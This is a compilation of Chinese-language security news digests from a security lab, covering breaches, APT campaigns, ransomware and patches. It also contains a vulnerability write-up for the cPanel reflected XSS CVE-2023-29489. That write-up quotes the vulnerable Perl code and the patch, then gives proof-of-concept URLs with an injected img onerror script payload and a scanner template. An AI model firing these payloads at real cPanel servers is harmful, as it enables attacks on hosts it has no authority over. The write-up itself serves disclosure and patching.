Bitmarck是德国最大的社会保险公司IT服务提供商之一，近日宣布遭受了网络攻击。由于网络攻击，它已将其所有系统脱机。该事件影响了由BITMARCK运营IT的法定健康保险公司，该公司立即向有关部门报告了这一事件。该公司排除了数据泄露，它指出存储在EHR中的患者数据过去和将来都不会受到攻击的威胁。 5、T-Mobile披露自2023年初以来的第二次数据泄露 https://www.bleepingcomputer.com/news/security/t-mobile-discloses-second-data-breach-since-the-start-of-2023/ T-Mobile披露了2023年的第二次数据泄露事件，此前发现攻击者从2023年2月下旬开始访问了数百名客户的个人信息一个多月。与T-Mobile之前报告的数据泄露事件（其中最新一次影响了37万人）相比，这一事件仅影响了836名客户。尽管如此，暴露的信息量仍然非常广泛，并使受影响的个人面临身份盗用和网络钓鱼攻击。 6、APT-Q-27使用双重DLL侧加载来逃避检测 https://www.bleepingcomputer.com/news/security/hackers-start-using-double-dll-sideloading-to-evade-detection/ 一个名为“Dragon Breath”、“Golden Eye Dog”或“APT-Q-27”的APT黑客组织正在展示一种新的攻击趋势，即使用经典的DLL侧加载技术的多种复杂变化来逃避检测。这些攻击变种从一个初始向量开始，该向量利用一个安全的应用程序，最常见的是Telegram，它侧加载第二阶段的有效负载，有时也是无毒的，反过来又侧加载恶意软件加载程序DLL。之后，恶意加载程 7、研究人员发现BGP协议实现-FRRouting中的拒绝服务(DoS)漏洞 https://securityaffairs.com/145676/security/bgp-frrouting-flaws.html 研究人员发现了BGP边界网关协议中的安全漏洞，可以将其武器化以在易受攻击的BGP对等点上实现拒绝服务(DoS)攻击。本次发现的3个漏洞存在于FRRouting的8.4版中，FRRouting是一种适用于Linux和Unix平台的主流开源互联网路由协议套件。它目前被NVIDIA Cumulus、DENT和SONiC等多家供应商使用，所以本次安全漏洞也构成供应链风险。研究人员在对7种不同的BGP协议实现（FRRouting、BIRD、OpenBGPd、Mikr 8、黑客利用TBK DVR设备中5年未修补的漏洞 https://www.bleepingcomputer.com/news/security/hackers-exploit-5-year-old-unpatched-flaw-in-tbk-dvr-devices/ 黑客正在积极利用暴露的TBK DVR（数字视频录制）设备中未修补的2018年身份验证绕过漏洞。DVR是安全监控系统不可或缺的一部分，因为它们可以记录和存储摄像机录制的视频。TBK Vision 的网站声称其产品部署在银行、政府机构、零售业等。由于这些DVR服务器用于存储敏感的安全录像，因此它们通常位于内部网络上以防止未经授权访问录制的视频。不幸的是，这使得它们对威胁行为者具有吸 9、谷歌推出无密码登录功能-Passkey https://www.freebuf.com/news/365448.html The Hacker News 网站披露谷歌又“玩出了”新花样，推出一项名为 Passkey 的新功能，用户可以无需密码，使用更安全、更简单、更快速的方式登录其谷歌账号。 10、91% 企业认为 Deepfake 类型诈骗威胁日益严重 https://www.ithome.com/0/689/664.htm 根据身份认证专业机构 Regula 公布的最新报告，Deepfake 类型的欺诈案件正快速上升，29% 的企业遭受过这种类型的欺诈，91% 的受访企业认为该威胁已日益严重。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

一、漏洞原理 漏洞简述 cPanel 是一套在网页寄存业中最享负盛名的商业软件，是基于于 Linux 和 BSD 系统及以 PHP 开发且性质为闭源软件；提供了足够强大和相当完整的主机管理功能，诸如：Webmail 及多种电邮协议、网页化 FTP 管理、SSH 连线、数据库管理系统、DNS 管理等远端网页式主机管理软件功能。 该漏洞可以无身份验证情况下利用，无论cPanel管理端口2080, 2082, 2083, 2086是否对外开放 漏洞影响范围 供应商：cPanel 产品：cPanel 确认受影响版本：< 11.109.9999.116 修复版本：11.109.9999.116, 11.108.0.13, 11.106.0.18, and 11.102.0.31 漏洞分析 本漏洞的漏洞点来自系统中涉及交互的关键变量未进行转义或过滤处理，导致攻击者可以构造恶意代码作为输入进行利用。 Httpd.pm： elsif ( 0 == rindex( $doc_path, '/cpanelwebcall/', 0 ) ) {    # First 15 chars are “/cpanelwebcall/”    _serve_cpanelwebcall(        $self->get_server_obj(),        substr( $doc_path, 15 ),   ); } 上述代码说明任何路径均会被路由到，包括目录后的字符部分。 其中涉及函数_serve_cpanelwebcall： sub _serve_cpanelwebcall ( $server_obj, $webcall_uri_piece ) {    require Cpanel::Server::WebCalls;    my $out = Cpanel::Server::WebCalls::handle($webcall_uri_piece);    $server_obj->respond_200_ok_text($out);        return; } 其中局部变量out为handle函数的返回值，是参数webcall_uri_piece的处理结果。 sub handle ($request) {    my $id = extract_id_from_request($request);    substr( $request, 0, length $id ) = q<>;    Cpanel::WebCalls::ID::is_valid($id) or do {        die _http_invalid_params_err("Invalid webcall ID: $id");   }; handle函数主要先从request提取id，之后根据id情况进行处理 sub _http_invalid_params_err ($why) {    return Cpanel::Exception::create_raw( 'cpsrvd::BadRequest', $why ); } _http_invalid_params_err函数主要是返回错误信息 进一步分析发现Httpd::ErrorPage下的 message_html变量未做任何处理，可被该漏洞利用 补丁部分 在最新版本cPanel可以看到针对该漏洞进行修复 Cpanel/Server/Handlers/Httpd/ErrorPage.pm： ++ use Cpanel::Encoder::Tiny               (); ... omitted for brevity ... ++ $var{message_html} = Cpanel::Encoder::Tiny::safe_html_encode_str( $var{message_html} ); 二、漏洞复现实战 漏洞复现 首先以某个cPanel target为例 之后根据POC进行复现 POC： http://example.com/cpanelwebcall/<img%20src=x%20onerror="prompt(1)">aaaaaaaaaaaa http://example.com:2082/cpanelwebcall/<img%20src=x%20onerror="prompt(1)">aaaaaaaaaaaa http://example.com:2086/cpanelwebcall/<img%20src=x%20onerror="prompt(1)">aaaaaaaaaaaa 注：其他端口也有可能存在该漏洞 requests: - method: GET   path:     - '{{BaseURL}}/cpanelwebcall/<img%20src=x%20onerror="prompt(1)">aaaaaaaaaaaa'   matchers:     - type: word       words:         - '<img src=x onerror="prompt(1)">' 执行POC 漏洞修复 建议更新至版本11.109.9999.116、 11.108.0.13 、11.106.0.18 和 11.102.0.31 启用cPanel 自动更新功能 结束语 本文主要介绍了CVE-2023-29489 cPanel XSS漏洞的原理分析及复现过程，漏洞主要由于涉及交互的关键变量未进行转义或过滤处理，从而造成攻击者可以在无身份验证情况下进行利用。

1、Magecart仿造出逼真的在线支付界面 https://www.malwarebytes.com/blog/threat-intelligence/2023/04/kritec-art研究人员在跟进Magecart威胁行为体信用卡窃取器活动时，发现几乎能以假乱真的在线付款WEB界面和表格，威胁行为者使用了受感染商店的原始徽标，并自定义了逼真的Web界面，以劫持结帐页面。此外还发现恶意软件作者不仅精通网页设计，在每个表单字段中使用适当的语言（法语）制作欺诈性付款表格。 2、山寨版Minecraft Android游戏隐藏广告软件 https://www.bleepingcomputer.com/news/security/android-minecraft-clones-with-35m-downloads-infect-users-with-adware/Minecraft是一款流行的沙盒游戏，每月有1.4亿活跃玩家，许多游戏发行商都试图重新创建它。研究人员发现全球约有3500万Android用户下载了隐藏广告软件的山寨Minecraft游戏，山寨游戏感染了带有Android广告软件“HiddenAds”的设备，会在后台偷偷加载广告，但游戏屏幕上不会显示任何内容，为其运营商创收。目前所有有问题的应用程序都已从应用商店 3、ViperSoftX新变种以密码管理器为目标 https://www.bleepingcomputer.com/news/security/vipersoftx-info-stealing-malware-now-targets-password-managers/研究人员发现ViperSoftX新变种现在针对的加密货币钱包的攻击行动比以前更多，该恶意软件正在检查与两个密码管理器（即1Password和KeePass 2）相关的文件，试图窃取存储在其浏览器扩展中的数据，威胁行为体可能会在攻击的后期阶段以此类恶意活动为目标。 5、Zyxel发布修复防火墙漏洞的安全补丁 https://thehackernews.com/2023/04/zyxel-firewall-devices-vulnerable-to.htmlZyxel发布了针对其防火墙设备中一个严重安全漏洞的补丁，该漏洞被记录为CVE-2023-28771，在 CVSS 评分系统中的评分为 9.8，可被利用在受影响的系统上实现远程代码执行。此外Zyxel还解决了影响选定防火墙版本（ CVE-2023-27991 ，CVSS 分数：8.8）的高严重性身份验证后命令注入漏洞，该漏洞可能允许经过身份验证的攻击者远程执行某些操作系统命令。 6、FDA发出警告Illumina医疗设备易受远程网络攻击 https://www.securityweek.com/fda-cisa-illumina-medical-devices-vulnerable-to-remote-hacking美国政府部门正在通知医疗保健提供者和实验室人员，一些Illumina医疗设备使用的组件可能受到允许远程黑客攻击的漏洞的影响。该供应商发布了补丁和缓解措施，并发布了公告，告知客户必须采取哪些步骤来防止潜在的利用。目前尚未发现这些漏洞在野利用的证据，但警告黑客可以利用这些漏洞远程控制设备，或者更改设备或用户网络上的配置、设置、软件或数据。 7、APT28利用伪造的Windows更新指南攻击乌克兰政府 https://www.bleepingcomputer.com/news/security/hackers-use-fake-windows-update-guides-to-target-ukrainian-govt/乌克兰CERT称APT28利用伪造的Windows更新指南针对乌克兰政府机构和军事组织发起钓鱼邮件攻击。攻击者为了伪装成目标政府的系统管理员，使用在攻击准备阶段通过未知方式获得的真实员工姓名创建了@outlook.com电子邮件地址。恶意电子邮件不是关于升级Windows系统的合法说明，而是建议收件人运行PowerShell命令。此命令在计算机上下载PowerShell脚本， 8、研究人员发现AresLoader正在通过伪装的GitLab存储库传播 https://blog.cyble.com/2023/04/28/citrix-users-at-risk-aresloader-spreading-through-disguised-gitlab-repo/近期，Cyble研究和情报实验室（CRIL）观察到一个名为AresLoader的新加载程序，该加载程序已用于传播多种类型的恶意软件家族。AresLoader是一种用C语言编写的加载程序恶意软件，于2022年首次出现在网络犯罪论坛和电报频道中。此加载程序在恶意软件即服务（MaaS）模型上可用，由负责 AiD Locker勒索软件的同一威胁参与者（TA）开发。该组织的成员还被怀疑与俄罗斯黑 9、LockBit和Cl0p勒索软件团伙利用PaperCut漏洞进行攻击 https://www.malwarebytes.com/blog/news/2023/04/lockbit-and-cl0p-are-actively-exploiting-papercut-vulnerabilities研究人员发现LockBit和Cl0p勒索软件团伙正在利用PaperCut漏洞进行攻击。这些漏洞能够攻击PaperCut服务器并干扰其正常工作，制造混乱。安全专家提醒用户及时更新PaperCut软件以获得相关补丁，以免受到攻击。LockBit和Cl0p是目前勒索软件领域中比较活跃的黑客团伙，经常利用漏洞入侵受害者系统部署勒索软件。 10、恶意软件伪装成ChatGPT桌面客户端窃取Chrome登录数据 https://www.helpnetsecurity.com/2023/05/02/chatgpt-infostealer/研究人员发现一个伪装成ChatGPT Windows桌面客户端的窃密木马，该窃密木马能够从Google Chrome登录数据文件夹中复制保存的凭据。ChatGPT 尚未发布官方桌面客户端，但这个虚假版本看起来与人们的预期非常相似。该窃密木马通过一个zip存档进行分发，其中包含一个名为ChatGPT For Windows Setup 1.0.0.exe的文件。在安装过程中，恶意软件在后台运行，并使用Havelock开始提取Chrome登录数据，Havelock是一种从基 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

1、伊朗APT 35组织使用一种新恶意软件BellaCiao https://securityaffairs.com/145354/malware/iran-charming-kitten-bellaciao.html 与伊朗有联系的APT组织Charming Kitten（又名 APT35、Phosphorus、Newscaster和Ajax安全团队）使用一种名为BellaCiao的新型恶意软件攻击美国、欧洲、中东和印度的受害者。BellaCiao充当个性化的投放程序，用于将其他恶意有效负载传送到基于受害者的机器上。专家们尚未确定最初的感染媒介，但他们认为攻击者使用了Microsoft Exchange漏洞利用链（如 ProxyShell、Proxy 2、Telegram出现新的针对macOS系统的窃取器 https://blog.cyble.com/2023/04/26/threat-actor-selling-new-atomic-macos-amos-stealer-on-telegram/ 研究人员发现近期在Telegram上宣传一种名为Atomic macOS Stealer (AMOS)的新型信息窃取恶意软件。该恶意软件专门针对macOS而设计，当前还在不断添加新功能以使其更有效。4月25日Telegram上显示了该恶意软件的最新功能，可以从受害者的机器上窃取各种类型的信息，包括钥匙串密码、完整的系统信息、桌面和文档文件夹中的文件，甚至是 macOS 密码。研究人员对该恶意软件进行 3、PrestaShop修复了允许用户删除数据库的漏洞 https://www.bleepingcomputer.com/news/security/prestashop-fixes-bug-that-lets-any-backend-user-delete-databases/ 开源电子商务平台PrestaShop发布了一个新版本，该版本解决了一个严重漏洞，该漏洞允许任何后台用户写入、更新或删除 SQL 数据库，无论其权限如何。后台用户包括所有者、管理员、销售代表、客户支持代理、订单处理人员、数据输入人员等。该漏洞编号为CVE-2023-30839（CVSS v3.1 得分：9.9），可能对受影响的企业造成重大损害或服务中断，并影响所有8.0. 4、思科披露服务器管理工具中的XSS零日漏洞 https://www.bleepingcomputer.com/news/security/cisco-discloses-xss-zero-day-flaw-in-server-management-tool/ 思科披露了该公司Prime Collaboration Deployment (PCD) 软件中的一个零日漏洞，该漏洞编号为CVE-2023-20060，由北约网络安全中心 (NCSC)在Cisco PCD 14和更早版本的基于Web的管理界面中发现，可被用于跨站点脚本攻击。虽然思科分享了有关该漏洞影响的信息，但需要在下个月才能发布安全更新。当前尚未发现该漏洞任何恶意使用的证据。 5、网络犯罪分子利用 PaperCut 漏洞分发 Cl0p 和 LockBit 勒索软件 https://securityaffairs.com/145377/hacking/papercut-exploits-cl0p-lockbit-ransomware.html 微软透露，最近针对 PaperCut 服务器的攻击旨在分发 Cl0p 和 LockBit 勒索软件。 6、谷歌获得法院命令以中断 CryptBot 分发 https://thehackernews.com/2023/04/google-gets-court-order-to-take-down.html 谷歌周三表示，它在美国获得了一项临时法院命令，以破坏基于 Windows 的信息窃取恶意软件CryptBot的分发并“减缓”其增长。据估计，CryptBot在 2022 年已感染超过 670,000 台计算机，其目标是窃取 Google Chrome 用户的敏感数据，例如身份验证凭据、社交媒体帐户登录和加密货币钱包。 7、谷歌为 Chrome 扩展添加了新的风险评估工具 https://www.helpnetsecurity.com/2023/04/25/risk-assessment-chrome-extensions/ Google 为 Google Workspace 管理员和安全团队提供了一种新工具，用于评估不同的 Chrome 扩展程序可能给用户带来的风险：Spin.AI App Risk Assessment。该工具可通过 Chrome 浏览器云管理控制台使用，并为管理员提供有关潜在安全威胁的宝贵见解。 8、黑客演示如何“接管”欧洲航天局卫星 https://www.freebuf.com/news/365086.html The record 网站披露，网络安全研究人员将在本周展示如何夺取欧洲航天局（ESA）卫星控制权，此次演示也被称为世界上第一次卫星网络攻击演习。法国国防巨头泰雷兹（Thales）的网络安全专家宣布将与 ESA 团队成员一起，在巴黎举行的 CYSAT 会议上对攻击场景进行深入解读。 9、OpenAI 将隐身模式引入 ChatGPT https://cybernews.com/privacy/openai-introduces-chatgpt-incognito-mode/ OpenAI为不希望自己的对话历史被保存、或被用于训练大型语言模型的用户创建了ChatGPT "隐身模式"。如果禁用，当用户开始聊天对话时，通常保存在 ChatGPT 侧边栏中的历史对话将不再出现。 10、安全专家用30块显卡搭建密码破解器,每秒可验证6.2万亿个NTLM哈希 https://www.ithome.com/0/689/098.htm 安全专家凯文・米特尼克（Kevin Mitnick）近日使用 24 块 RTX 4090 显卡和 6 块 RTX 2080 显卡，组建了一台用于破解密码的超级计算机，并将称之为“badass password cracker”。他在推文中表示：“在 NTLM（基于挑战 / 应答的身份验证协议）上每秒验证超过 6.2 万亿个哈希。具体可能受工作量和其它因素影响，但这是平均值”。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

1、Mirai僵尸网络利用TP-Link路由器漏洞进行传播 https://www.bleepingcomputer.com/news/security/tp-link-archer-wifi-router-flaw-exploited-by-mirai-malware/ Mirai恶意软件僵尸网络正在积极利用跟踪为CVE-2023-1389的TP-Link Archer A21 (AX1800) WiFi路由器漏洞将设备整合到DDoS（分布式拒绝服务）中。该问题是TP-Link Archer AX21路由器Web管理界面的区域设置API中的高危 (CVSS v3: 8.8) 未经身份验证的命令注入漏洞。该漏洞于2023年1月被披露给 P-Link 2、APT35部署PowerLess后门发动钓鱼攻击 https://thehackernews.com/2023/04/iranian-hackers-launch-sophisticated.html 网络安全公司Check Point观察到伊朗民族国家威胁参与体APT35（或Mint Sandstorm，以前称为 Phosphorus）与针对以色列的新一波网络钓鱼攻击有关，该攻击旨在部署名为PowerLess的后门的更新版本。APT35至少从2011年开始活跃，通过利用虚假社交媒体角色、鱼叉式网络钓鱼技术和暴露在 nternet上的应用程序中的N-day漏洞来获取初始访问权限并投放各种有效负载（包括勒索软件）。 3、Google Ads 被滥用以分发新的 LOBSHOT 恶意软件 https://cyware.com/news/google-ads-abused-to-distribute-new-lobshot-malware-ef54547d Elastic 安全实验室发现了 LOBSHOT，这是一种以前未知的 hVNC 恶意软件，它冒充合法软件获取经济利益，并通过恶意广告（例如 Google Ads）进行推广，以扩大其影响范围并实施攻击。它针对 32 个 Chrome 扩展程序、9 个 Edge 钱包扩展和 11 个 Firefox 钱包扩展，使威胁行为者能够窃取加密货币资产。 4、 FIN7 黑客利用最近的 Veeam Backup & Replication漏洞 https://www.securityweek.com/fin7-hackers-caught-exploiting-recent-veeam-vulnerability 据网络安全公司 WithSecure 报道，网络犯罪组织 FIN7 在最近的攻击中被发现利用未打补丁的 Veeam Backup & Replication 实例。 5、Wiz机构披露利用阿里云docker逃逸漏洞大杀四方的细节 https://www.freebuf.com/articles/network/364411.html Wiz机构 在阿里云的两个热门服务 ApsaraDB RDS for PostgreSQL 和 AnalyticDB for PostgreSQL中发现了一系列严重漏洞。这些被称为#BrokenSesame的漏洞可能允许未经授权访问阿里云客户的 PostgreSQL数据库，并能够对阿里巴巴的两个数据库服务执行供应链攻击，从而导致对阿里巴巴数据库服务的 RCE。 6、RSAC 2023大会上，多家公司发布由生成式AI驱动的新一代网络安全工具 https://www.secrss.com/articles/54122 今年，与 RSAC 相关的产品发布热潮从大会开幕当天就已经开始，而生成式 AI 技术成为了许多产品的前沿技术核心。到目前为止，包括谷歌云和埃森哲等公司的安全运营团队已发布了基于人工智能的生成式内容产品。 7、《反间谍法》修订，将对国家机关实施网络攻击等行为明确为间谍行为 http://www.news.cn/2023-04/26/c_1129568977.htm 新修订的反间谍法将于7月1日起施行，新修订的反间谍法将“针对国家机关、涉密单位或者关键信息基础设施等实施网络攻击等行为”明确为间谍行为。 8、ViperSoftX升级了先进的反检测技术 https://cyware.com/news/vipersoftx-upgraded-with-sophisticated-anti-detection-techniques-7bb40000 在信息窃取者 ViperSoftX 采用新的反检测功能后，澳大利亚、日本和美国的消费者和企业部门已经有大量受害者。企业部门占受影响受害者总数的40%以上。最新版本的信息窃取器具有从两个密码管理器（如 KeePass 2 和 1Password）窃取密码的功能。 9、不安全的默认配置使Apache Superset易遭受RCE 攻击 https://thehackernews.com/2023/04/apache-superset-vulnerability-insecure.html 该漏洞被追踪为CVE-2023-27524（CVSS 评分：8.9），影响 2.0.1 及以下的版本，并且与默认 SECRET_KEY 的使用有关，攻击者可能会滥用该默认 SECRET_KEY 来验证和访问互联网上未经授权的服务器。 10、泛微Ecology SQL注入漏洞安全风险通告 https://www.secrss.com/articles/54070 近日，奇安信CERT监测到泛微Ecology SQL注入漏洞(QVD-2023-9849)，泛微 Ecology OA 系统对用户传入的数据过滤处理不当，导致存在 SQL 注入漏洞，未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令，从而窃取数据库敏感信息。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。